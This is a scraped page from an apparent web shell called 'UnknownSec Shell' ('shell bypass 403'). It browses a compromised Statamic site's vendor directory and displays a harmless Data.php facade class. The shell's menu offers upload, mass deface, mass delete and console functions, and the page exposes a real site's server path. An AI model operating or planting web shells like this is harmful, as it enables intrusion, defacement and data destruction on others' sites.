shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Facades
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Data.php
<?php namespace Statamic\Facades; use Illuminate\Support\Facades\Facade; use Statamic\Contracts\Data\DataRepository; /** * @method static find($reference) * @method static findByUri($uri, $site = null) * @method static splitReference($reference) * * @see \Statamic\Data\DataRepository */ class Data extends Facade { protected static function getFacadeAccessor() { return DataRepository::class; } }
© 2026 UnknownSec